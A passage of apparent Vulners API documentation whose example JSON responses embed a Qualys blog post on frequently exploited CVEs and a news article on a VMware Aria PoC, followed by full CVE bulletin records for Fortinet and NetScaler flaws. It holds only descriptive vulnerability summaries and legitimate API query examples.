**CVE-2019-11510: Pulse Secure Pulse Connect Secure SSL VPN Unauthenticated Path**\n\n**Vulnerability Trending Over Years: 2019, 2020, 2023 (53 times)**\n\nIt was exploited by 13 Malware, 18 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 38771**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2019-11510 is a critical vulnerability found in Pulse Connect Secure, a widely used VPN solution by Pulse Secure. The flaw enables an unauthenticated, remote attacker to exploit a specific endpoint and read arbitrary files on the system, including sensitive information such as private keys and user credentials.\n\nDue to its severity, It can provide an attacker with similar access to the corporate network as a legitimate user.\n\n### 10\\. **CVE-2021-44228: Apache Log4j Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (77 times)**\n\nIt was exploited by 10 Malware, 26 Threat Actors, and 5 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 376157, 730297**\n\n**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2021-44228, or "Log4Shell," is a severe vulnerability in Apache's log4j Java library. The flaw exploits the 'lookups' feature of log4j, enabling an attacker to use a specially crafted input to trigger the execution of a remote Java class on an LDAP server, leading to Remote Code Execution.\n\nThis issue is highly dangerous if the user input containing specific characters is logged by log4j. It can trigger Java method lookup, resulting in the execution of a user-defined remote Java class on an LDAP server, leading to Remote Code Execution (RCE) on the server running the vulnerable log4j instance.\n\n### 11\\. **CVE-2014-6271: Shellshock \u2013 Linux Bash Vulnerability**\n\n**Vulnerability Trending Over Years: 2014, 2016, 2017, 2020, 2021, 2022, 2023 (70 times)**\n\nIt was exploited by 18 Malware, 1 Threat Actors, and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 122693, 13038, 150134**\n\nShellshock (CVE-2014-6271) is a critical vulnerability affecting the Unix Bash shell in many Linux, Unix, and Mac OS systems. It allows remote code execution by misusing Bash's processing of environment variables, enabling attackers to append and execute malicious commands. It has a high severity score since it can impact multiple devices and applications, risking unauthorized data access or service disruption,\n\n### 12\\. **CVE-2018-8174: Windows VBScript Engine Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2023 (30 times)**\n\nIt was exploited by 21 Malware, 10 Threat Actors, and 7 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 91447**\n\nCVE-2018-8174 is a critical vulnerability in Microsoft Windows' VBScript Engine, enabling remote code execution. Triggered by viewing a malicious website with Internet Explorer or opening a rigged Microsoft Office document, this flaw allows an attacker to manipulate memory objects and execute code. \nThe attacker can fully control the system if the user has administrative rights.** \n**\n\n### 13\\. **CVE-2013-0074: Microsoft Silverlight Could Allow Remote Code Execution**\n\n**Vulnerability Trending Over Years**_**: **_**2023 (8 times)**\n\nIt was exploited by 62 Malware 50 Ransomware and was trending in the wild as recently as August 20, 2023.\n\n**Qualys Vulnerability Detection (QID): 90870**\n\nCVE-2013-0074 is a remote code execution vulnerability in Microsoft Silverlight, which permits a crafted Silverlight application to access memory unsafely, thereby leading to the execution of arbitrary code under the current user\u2019s security context.\n\nIf the user has admin rights, the attacker installs programs, alters or deletes data, or generates new accounts with full privileges. The user can be deceived into visiting a malicious website or clicking on a link, commonly through an email or instant message.\n\n### 14\\. **CVE-2012-0507: Oracle Java SE Remote Java Runtime Environment Vulnerability**\n\n**Vulnerability Trending Over Years: 2023 (10 times)**\n\nIt was exploited by 66 Malware, 3 Threat Actors, and 42 Ransomware and was trending in the wild as recently as July 26, 2023.\n\n**Qualys Vulnerability Detection (QID): 119956**\n\nCVE-2012-0507 is a critical vulnerability in the Java Runtime Environment (JRE) allowing untrusted Java applets to execute arbitrary code outside the Java sandbox. Originating from a flaw in the AtomicReferenceArray class implementation, **this vulnerability was exploited by Flashback Trojan in 2012**. It was observed to have led to one of the most significant known malware attacks on Apple devices. Attackers can exploit this vulnerability by tricking users into visiting a malicious website hosting a Java applet.\n\n### 15\\. **CVE-2019-19781: Citrix ADC and Citrix Gateway - Remote Code Execution (RCE) Vulnerability**\n\n**Vulnerability Trending Over Years: 2020, 2022, 2023 (60 times)**\n\nIt was exploited by 11 Malware, 12 Threat Actors, and 10 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 372305, 150273**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2019-19781, or "Shitrix," is a significant vulnerability associated with Citrix Application Delivery Controller (ADC) and Citrix Gateway, allowing unauthenticated attackers to perform arbitrary code execution, granting them access to internal network resources.\n\nThe flaw resides in the VPN component of the affected products, enabling directory traversal and giving attackers both read and write access to the underlying file system.\n\n### 16\\. **CVE-2018-0802: Microsoft Office Memory Corruption Vulnerability**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (19 times)**\n\nExploited by 29 Malware 24 Threat Actors, and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 110310**\n\nCVE-2018-0802 is a critical vulnerability within Microsoft Office and WordPad, which, if exploited, allows remote code execution via specially crafted files.\n\nAttackers can run arbitrary code in the current user's context, potentially taking over the system if the user holds administrative rights. This vulnerability was notably used in targeted attacks and was being actively exploited before Microsoft released a security update in January 2018 that correctly handles objects in memory, resolving the issue.\n\n### 17\\. **CVE-2021-26855: Microsoft Exchange Server Authentication Bypass (RCE)**\n\n**Vulnerability Trending Over Years:** **2021, 2023 (46 times)**\n\nIt was exploited by 19 Malware, 22 Threat Actors, and 9 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 50107, 50108**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2021-26855, a part of the ProxyLogon exploit chain, is a server-side request forgery (SSRF) vulnerability in Microsoft Exchange Server that enables attackers to bypass authentication mechanisms and impersonate users.\n\nThe flaw allows arbitrary HTTP requests, granting access to users' mailboxes and enabling information theft. It has been widely exploited by various threat actors, leading to emergency patches by Microsoft.\n\n### 18\\. **CVE-2019-2725: Oracle WebLogic Affected by Unauthenticated RCE Vulnerability**\n\n**Vulnerability Trending Over Years: 2019, 2020, 2022, 2023 (53 times)** \n\nIt was exploited by 10 Malware, 4 Threat Actors, 9 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 150267, 87386** \n\nCVE-2019-2725 is a severe remote code execution vulnerability in Oracle WebLogic Server that allows unauthenticated attackers to execute arbitrary code over a network without user interaction. It was quickly weaponized to install cryptocurrency miners. \n\n### 19\\. **CVE-2018-13379: Fortinet FortiGate (FortiOS) System File Leak through Secure Sockets Layer (SSL)**\n\n**Vulnerability Trending Over Years: 2020, 2021, 2023 (41 times)** \n\nIt was exploited by 6 Malware, 13 Threat Actors, 6 Ransomware and was trending in the wild as recently as August 30, 2023.\n\n**Qualys Vulnerability Detection (QID): 43702** \n\n**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier. **\n\nCVE-2018-13379 is a path traversal vulnerability found in the Fortinet FortiOS SSL VPN web portal. An unauthenticated attacker can read sensitive system files via specially crafted HTTP requests. The exploit could expose SSL VPN session data, leading to more severe attacks. \n\n### 20\\. CVE-2021-26084: Atlassian Confluence Server Webwork OGNL Injection RCE Vulnerability\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (35 times)**\n\nIt was exploited by 8 Malware, 6 Threat Actors, and 8 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 730172, 150368, 375839**\n\n**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2021-26084 is a critical vulnerability in Atlassian's Confluence Server and Data Center, specifically within the Webwork OGNL component. This vulnerability can enable an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance, potentially compromising system integrity.\n\n## TruRisk Dashboard\n\nThe Qualys VMDR helps organizations get instant visibility into high-risk and top twenty vulnerabilities.\n\n[![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/09/Blog-3-1070x588.jpg)](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/09/Blog-3.jpg>)Fig 3. Qualys VMDR TruRisk Dashboard for Top 20 Vulnerabilities\n\nThe **Qualys VMDR TruRisk Dashboard** helps organizations to have complete visibility into open vulnerabilities that focus on the organization\u2019s global risk score and high-risk vulnerabilities with your organization\u2019s global risk score and high-risk vulnerabilities. Once you identify the vulnerable assets for these top twenty CVEs prioritized among your remediation owners, you can use Qualys Patch management to instantly reduce the risk.\n\nThe TruRisk VMDR Dashboard is available \u2013 [Download the Dashboard Here](<https://blog.qualys.com/wp-content/uploads/2023/09/Qualys_VMDR_TruRisk__Dashboard.zip>)\n\n## Key Insights & Takeaways\n\n * In the current Vulnerability Threat Landscape, identifying open vulnerabilities and effective remediation is the highest priority for every defender.\n * Among the vast scale of the CVEs available, you need to know the weaponized high-risk vulnerabilities that are actively targeted by Threat Actors, Malware, and ransomware families.\n * Use multi-dimensional Threat Intelligence to prioritize vulnerabilities rather than implementing multiple siloed threat approaches.\n * The Qualys VMDR with TruRisk automatically prioritizes vulnerabilities exploited in the wild with a TruRisk score of 90 or higher, greatly simplifying the prioritization process.\n\n## References\n\n * [Part 1: An In-Depth Look at the Latest Vulnerability Threat Landscape](<https://blog.qualys.com/product-tech/2023/07/11/an-in-depth-look-at-the-latest-vulnerability-threat-landscape-part-1>)\n * [Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers\u2019 Edition)](<https://blog.qualys.com/vulnerabilities-threat-research/2023/07/18/part-2-an-in-depth-look-at-the-latest-vulnerability-threat-landscape-attackers-edition>)\n\n## Additional Contributors\n\n * **Shreya Salvi, Data Scientist, Qualys**\n * **Saeed Abbasi, Product Manager, Vulnerability Research**",
"published": "2023-09-04T14:00:00",
"type": "qualysblog",
"title": "Qualys Top 20 Most Exploited Vulnerabilities"
},
{
"cvelist": [
"CVE-2023-20890",
"CVE-2023-20900",
"CVE-2023-34039"
],
"description": "[![SSH Auth Bypass Vulnerability](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjE4D8MhqYWhfOd2aFpaVvixDOV5nqQyXiMBd139w2Jpvafo4jbxBZb67rbGUsBQGPRZXiZ-SHUBx7swBloTSp-zcUZOaJJHmtml2DKIPhpb0BbyUObsy_u1BBNtROerY_zG41faeFdJnc81KF2uLkLuSFBHt7h_32nWsKDAEpauo0kNvWDGetxuzCRHV4D/s728-e365/exploit.jpg>)\n\nProof-of-concept (PoC) exploit code has been made available for a recently disclosed and patched critical flaw impacting VMware Aria Operations for Networks (formerly vRealize Network Insight).\n\nThe flaw, tracked as [CVE-2023-34039](<https://thehackernews.com/2023/08/critical-vulnerability-alert-vmware.html>), is rated 9.8 out of a maximum of 10 for severity and has been described as a case of authentication bypass due to a lack of unique cryptographic key generation.\n\n\"A malicious actor with network access to Aria Operations for Networks could bypass SSH authentication to gain access to the Aria Operations for Networks CLI,\" VMware said earlier this week.\n\nSummoning Team's Sina Kheirkhah, who published the PoC following an analysis of the patch released by VMware, said the root cause can be traced back to a bash script containing a method named refresh_ssh_keys(), which is responsible for overwriting the current SSH keys for the support and ubuntu users in the authorized_keys file.\n\n\"There is SSH authentication in place; however, VMware forgot to regenerate the keys,\" Kheirkhah [said](<https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/>). \"VMware's Aria Operations for Networks had hard-coded its keys from version 6.0 to 6.10.\"\n\n[![Cybersecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thn.news/o6a5Vxgy> \"Cybersecurity\" )\n\nVMware's latest fixes also address CVE-2023-20890, an arbitrary file write vulnerability impacting Aria Operations for Networks that could be abused by an adversary with administrative access to write files to arbitrary locations and achieve remote code execution.\n\nIn other words, a threat actor could leverage the PoC to obtain admin access to the device and exploit CVE-2023-20890 to run arbitrary payloads, making it crucial that users apply the updates to secure against potential threats.\n\nThe release of the PoC coincides with the virtualization technology giant issuing fixes for a high-severity SAML token signature bypass flaw (CVE-2023-20900, CVSS score: 7.5) across several Windows and Linux versions of VMware Tools.\n\n\"A malicious actor with man-in-the-middle (MITM) network positioning in the virtual machine network may be able to bypass SAML token signature verification, to perform VMware Tools Guest Operations,\" the company [said](<https://www.vmware.com/security/advisories/VMSA-2023-0019.html>) in an advisory released Thursday.\n\nPeter St\u00f6ckli of GitHub Security Lab has been credited with reporting the flaw, which affects the following versions -\n\n * VMware Tools for Windows (12.x.x, 11.x.x, 10.3.x) - Fixed in 12.3.0\n * VMware Tools for Linux (10.3.x) - Fixed in 10.3.26\n * Open-source implementation of VMware Tools for Linux or open-vm-tools (12.x.x, 11.x.x, 10.3.x) - Fixed in 12.3.0 (to be distributed by Linux vendors)\n\nThe development also comes as Fortinet FortiGuard Labs [warned](<https://www.fortinet.com/blog/threat-research/multiple-threats-target-adobe-coldfusion-vulnerabilities>) of continued exploitation of [Adobe ColdFusion Vulnerabilities](<https://thehackernews.com/2023/07/adobe-rolls-out-new-patches-for.html>) by threat actors to deploy cryptocurrency miners and [hybrid bots](<https://research.checkpoint.com/2020/rudeminer-blacksquid-and-lucifer-walk-into-a-bar/>) such as Satan DDoS (aka Lucifer) and RudeMiner (aka SpreadMiner) that are capable of carrying out cryptojacking and distributed denial-of-service (DDoS) attacks.\n\nAlso deployed is a backdoor named [BillGates](<https://www.trendmicro.com/en_us/research/19/g/multistage-attack-delivers-billgates-setag-backdoor-can-turn-elasticsearch-databases-into-ddos-botnet-zombies.html>) (aka [Setag](<https://www.fortinet.com/blog/threat-research/recent-attack-uses-vulnerability-on-confluence-server>)), which is known for hijacking systems, stealing sensitive information, and initiating DDoS attacks.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n",
"published": "2023-09-03T04:42:00",
"type": "thn",
"title": "PoC Exploit Released for Critical VMware Aria's SSH Auth Bypass Vulnerability"
}
]
Full data by id¶
Full information on a bulletin using a specific identifier.
Required parameters:
- id (str): bulletin id
- apiKey: Activated API key
Query:
POST /api/v3/search/id/
Query example:
curl -XPOST https://vulners.com/api/v3/search/id -H 'Content-Type: application/json' -d '{
"id": "CVE-2024-21762",
"fields": ["*"],
"apiKey": "{API key}"
}'
CVE_2024_21762 = vulners_api.get_bulletin("CVE-2024-21762", fields=["*"])
{
"id": "CVE-2024-21762",
"vendorId": null,
"type": "cve",
"bulletinFamily": "NVD",
"title": "CVE-2024-21762",
"description": "A out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7 allows attacker to execute unauthorized code or commands via specifically crafted requests",
"published": "2024-02-09T09:15:08",
"modified": "2024-02-10T02:00:01",
"epss": [
{
"cve": "CVE-2024-21762",
"epss": 0.01179,
"percentile": 0.84607,
"modified": "2024-02-12"
}
],
"cvss": {
"score": 7.5,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5
},
"severity": "HIGH",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"cvssV3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL"
}
},
"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-21762",
"reporter": "[email protected]",
"references": [
"https://fortiguard.com/psirt/FG-IR-24-015"
],
"cvelist": [
"CVE-2024-21762"
],
"immutableFields": [],
"lastseen": "2024-02-12T15:22:04",
"viewCount": 47,
"enchantments": {
"short_description": "CVE-2024-21762: Out-of-bounds write in Fortinet FortiOS versions, allowing unauthorized code executio",
"tags": [
"cve-2024-21762",
"fortinet",
"fortios",
"out-of-bounds write",
"unauthorized code execution",
"security vulnerability",
"nvd"
],
"dependencies": {
"references": [
{
"type": "cisa_kev",
"idList": [
"CISA-KEV-CVE-2024-21762"
]
},
{
"type": "hivepro",
"idList": [
"HIVEPRO:4FDFE6EE844A7B3ED3D4E07DA047CFCA"
]
},
{
"type": "nessus",
"idList": [
"FORTIGATE_FG-IR-24-015.NASL"
]
},
{
"type": "prion",
"idList": [
"PRION:CVE-2024-21762"
]
},
{
"type": "rapid7blog",
"idList": [
"RAPID7BLOG:0E907B2DDA83198AFC222340903BE902"
]
},
{
"type": "thn",
"idList": [
"THN:F60A4974F1101ED1147C3C221F8FF1EF"
]
},
{
"type": "wizblog",
"idList": [
"WIZBLOG:73EB08B6610483BFE7972345C53E5AD8"
]
}
]
},
"score": {
"value": 7.9,
"uncertanity": 1.7,
"vector": "NONE"
},
"exploitation": {
"wildExploitedSources": [
{
"type": "cisa_kev",
"idList": [
"CISA-KEV-CVE-2024-21762"
]
}
],
"wildExploited": true
},
"reddit": {
"counter": 90,
"posts": [
{
"link": "https://www.reddit.com/r/fortinet/comments/1aodfgl/iocs_for_cve202421762/",
"text": "IOCsforCVE-2024-21762",
"author": "tacticalAlmonds",
"author_photo": "https://www.redditstatic.com/avatars/defaults/v2/avatar_default_3.png",
"date": "2024-02-11T20:32:44+00:00"
}
]
},
"vulnersScore": 7.9
},
"cna_cvss": {
"cna": "fortinet",
"cvss": {
"3": {
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:W/RC:C",
"score": 9.6
}
}
},
"cpe": [],
"cpe23": [],
"cwe": [
"CWE-787"
],
"affectedSoftware": [],
"affectedConfiguration": [],
"cpeConfiguration": {},
"extraReferences": [
{
"url": "https://fortiguard.com/psirt/FG-IR-24-015",
"source": "[email protected]"
}
],
"product_info": [
{
"vendor": "Fortinet",
"product": "FortiOS"
},
{
"vendor": "Fortinet",
"product": "FortiProxy"
}
],
"solutions": [
{
"lang": "en",
"value": "Please upgrade to FortiProxy version 7.4.3 or above \nPlease upgrade to FortiProxy version 7.2.9 or above \nPlease upgrade to FortiProxy version 7.0.15 or above \nPlease upgrade to FortiProxy version 2.0.14 or above \nPlease upgrade to FortiOS version 7.6.0 or above \nPlease upgrade to FortiOS version 7.4.3 or above \nPlease upgrade to FortiOS version 7.2.7 or above \nPlease upgrade to FortiOS version 7.0.14 or above \nPlease upgrade to FortiOS version 6.4.15 or above \nPlease upgrade to FortiOS version 6.2.16 or above \n"
}
],
"workarounds": [],
"impacts": [],
"problemTypes": [
{
"descriptions": [
{
"lang": "en",
"cweId": "CWE-787",
"description": "Execute unauthorized code or commands",
"type": "CWE"
}
]
}
],
"exploits": [],
"assigned": "2024-01-02T10:15:00"
}
Full data by id list¶
To obtain full information on a list of bulletins, please specify the identifiers of the required documents.
Required parameters:
- id (list): bulletin ids
- apiKey: Activated API key
Query:
POST /api/v3/search/id/
Query example:
curl -XPOST https://vulners.com/api/v3/search/id -H 'Content-Type: application/json' -d '{
"id": [
"CVE-2023-6548",
"CVE-2023-6549"],
"fields": ["*"],
"apiKey": "{API key}"
}'
multiple_cves= vulners_api.get_multiple_bulletins(id=["CVE-2023-6548", "CVE-2023-6549"], fields=["*"])
{
"CVE-2023-6548": {
"id": "CVE-2023-6548",
"vendorId": null,
"type": "cve",
"bulletinFamily": "NVD",
"title": "CVE-2023-6548",
"description": "Improper Control of Generation of Code ('Code Injection') in NetScaler ADC and NetScaler Gateway\u00a0allows an attacker with\u00a0access\u00a0to NSIP, CLIP or SNIP with management interface to perform\u00a0Authenticated (low privileged) remote code execution on Management Interface.",
"published": "2024-01-17T20:15:50",
"modified": "2024-01-25T16:45:58",
"epss": [
{
"cve": "CVE-2023-6548",
"epss": 0.01075,
"percentile": 0.838,
"modified": "2024-02-11"
}
],
"cvss": {
"score": 6.5,
"vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "SINGLE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5
},
"severity": "MEDIUM",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"cvssV3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH"
}
},
"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-6548",
"reporter": "[email protected]",
"references": [
"https://support.citrix.com/article/CTX584986/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20236548-and-cve20236549"
],
"cvelist": [
"CVE-2023-6548"
],
"immutableFields": [],
"lastseen": "2024-02-12T11:56:59",
"viewCount": 69,
"enchantments": {
"score": {
"value": 6.5,
"uncertanity": 0.2,
"vector": "NONE"
},
"dependencies": {
"references": [
{
"type": "attackerkb",
"idList": [
"AKB:BA3D9466-011E-4807-82FD-0DC03734CDDD"
]
},
{
"type": "cisa_kev",
"idList": [
"CISA-KEV-CVE-2023-6548"
]
},
{
"type": "citrix",
"idList": [
"CTX584986"
]
},
{
"type": "hivepro",
"idList": [
"HIVEPRO:E7C0D983EAA9A4C2CE2DCCCCA4B407DD"
]
},
{
"type": "malwarebytes",
"idList": [
"MALWAREBYTES:6CCC816574632169A05704CE0E1928C8"
]
},
{
"type": "nessus",
"idList": [
"NETSCALER_ADC_GATEWAY_CTX584986.NASL"
]
},
{
"type": "prion",
"idList": [
"PRION:CVE-2023-6548"
]
},
{
"type": "thn",
"idList": [
"THN:55036E69D47D64800FB4CB6F8068DA4F"
]
}
]
},
"reddit": {
"counter": 24,
"posts": [
{
"link": "https://www.reddit.com/r/CTI/comments/19a0a8c/cisa_adds_chrome_and_citrix_netscaler_to_its/",
"text": "CISAaddsChromeandCitrixNetScalertoitsKnownExploitedVulnerabilitiescatalog",
"author": "SirEliasRiddle",
"author_photo": "https://i.redd.it/snoovatar/avatars/nftv2_bmZ0X2VpcDE1NToxMzdfNDY2YTMzMDg4N2JkZjYyZDUzZjk2OGVhODI0NzkzMTUwZjA3NzYyZV8xMTkzMjQ5_rare_892c4323-6b60-487d-9278-5c0b90c591d4-headshot.png",
"date": "2024-01-18T23:43:43+00:00"
}
]
},
"exploitation": {
"wildExploitedSources": [
{
"type": "attackerkb",
"idList": [
"AKB:BA3D9466-011E-4807-82FD-0DC03734CDDD"
]
},
{
"type": "cisa_kev",
"idList": [
"CISA-KEV-CVE-2023-6548"
]
}
],
"wildExploited": true
},
"short_description": "CVE-2023-6548: Security vulnerability in a component of Vendor Product Version on multiple platforms allows attackers to impact via a specific vector",
"tags": [
"cve-2023-6548",
"security vulnerability",
"component",
"vendor",
"product",
"version",
"attack",
"impact",
"vector",
"nvd"
],
"vulnersScore": 6.5
},
"cna_cvss": {
"cna": "Citrix",
"cvss": {
"3": {
"vector": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"score": 5.5
}
}
},
"cpe": [],
"cpe23": [],
"cwe": [
"CWE-94",
"CWE-94"
],
"affectedSoftware": [
{
"cpeName": "citrix:netscaler_application_delivery_controller",
"version": "12.1-55.302",
"operator": "lt",
"name": "citrix netscaler application delivery controller"
},
{
"cpeName": "citrix:netscaler_application_delivery_controller",
"version": "13.0-92.21",
"operator": "lt",
"name": "citrix netscaler application delivery controller"
},
{
"cpeName": "citrix:netscaler_application_delivery_controller",
"version": "13.1-37.176",
"operator": "lt",
"name": "citrix netscaler application delivery controller"
},
{
"cpeName": "citrix:netscaler_application_delivery_controller",
"version": "13.1-51.15",
"operator": "lt",
"name": "citrix netscaler application delivery controller"
},
{
"cpeName": "citrix:netscaler_application_delivery_controller",
"version": "14.1-12.35",
"operator": "lt",
"name": "citrix netscaler application delivery controller"
},
{
"cpeName": "citrix:netscaler_gateway",
"version": "13.0-92.21",
"operator": "lt",
"name": "citrix netscaler gateway"
},
{
"cpeName": "citrix:netscaler_gateway",
"version": "13.1-51.15",
"operator": "lt",
"name": "citrix netscaler gateway"
},
{
"cpeName": "citrix:netscaler_gateway",
"version": "14.1-12.35",
"operator": "lt",
"name": "citrix netscaler gateway"
}
],
"affectedConfiguration": [],
"cpeConfiguration": {
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:12.1-55.302:*:*:*:fips:*:*:*",
"versionStartIncluding": "12.1",
"versionEndExcluding": "12.1-55.302",
"matchCriteriaId": "E5672003-8E6B-4316-B5C9-FE436080ADD1"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:12.1-55.302:*:*:*:ndcpp:*:*:*",
"versionStartIncluding": "12.1",
"versionEndExcluding": "12.1-55.302",
"matchCriteriaId": "D1A11ABD-4F45-4BA9-B30B-F1D8A612CC15"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:13.0-92.21:*:*:*:-:*:*:*",
"versionStartIncluding": "13.0",
"versionEndExcluding": "13.0-92.21",
"matchCriteriaId": "FC0A5AAC-62DD-416A-A801-A7A95D5EF73C"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:13.1-37.176:*:*:*:fips:*:*:*",
"versionStartIncluding": "13.1",
"versionEndExcluding": "13.1-37.176",
"matchCriteriaId": "8C8A6B95-8338-4EE7-A6EC-7D84AEDC4AF3"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:13.1-51.15:*:*:*:-:*:*:*",
"versionStartIncluding": "13.1",
"versionEndExcluding": "13.1-51.15",
"matchCriteriaId": "3CF77D9D-FC89-493D-B97D-F9699D182F54"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_application_delivery_controller:14.1-12.35:*:*:*:-:*:*:*",
"versionStartIncluding": "14.1",
"versionEndExcluding": "14.1-12.35",
"matchCriteriaId": "62CD82CF-9013-4E54-B175-19B804A351AA"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_gateway:13.0-92.21:*:*:*:*:*:*:*",
"versionStartIncluding": "13.0",
"versionEndExcluding": "13.0-92.21",
"matchCriteriaId": "68E1F810-ABCD-40A7-A8C1-4E8727799C7C"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_gateway:13.1-51.15:*:*:*:*:*:*:*",
"versionStartIncluding": "13.1",
"versionEndExcluding": "13.1-51.15",
"matchCriteriaId": "E870C309-D5CD-4181-9DEB-4833DE2EAEB7"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:citrix:netscaler_gateway:14.1-12.35:*:*:*:*:*:*:*",
"versionStartIncluding": "14.1",
"versionEndExcluding": "14.1-12.35",
"matchCriteriaId": "2836707F-A36F-479E-BFDC-CF55AEFC37EE"
}
]
}
]
},
"extraReferences": [
{
"url": "https://support.citrix.com/article/CTX584986/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20236548-and-cve20236549",
"source": "[email protected]",
"tags": [
"Vendor Advisory"
]
}
],
"product_info": [
{
"vendor": "Cloud Software Group",
"product": "NetScaler ADC"
},
{
"vendor": "Cloud Software Group",
"product": "NetScaler Gateway"
}
],
"solutions": [],
"workarounds": [],
"impacts": [],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-94",
"description": "CWE-94 Improper Control of Generation of Code ('Code Injection')",
"lang": "en",
"type": "CWE"
}
]
}
],
"exploits": [],
"assigned": "2023-12-06T11:01:54"
},
"CVE-2023-6549": {
"id": "CVE-2023-6549",
"vendorId": null,
"type": "cve",
"bulletinFamily": "NVD",
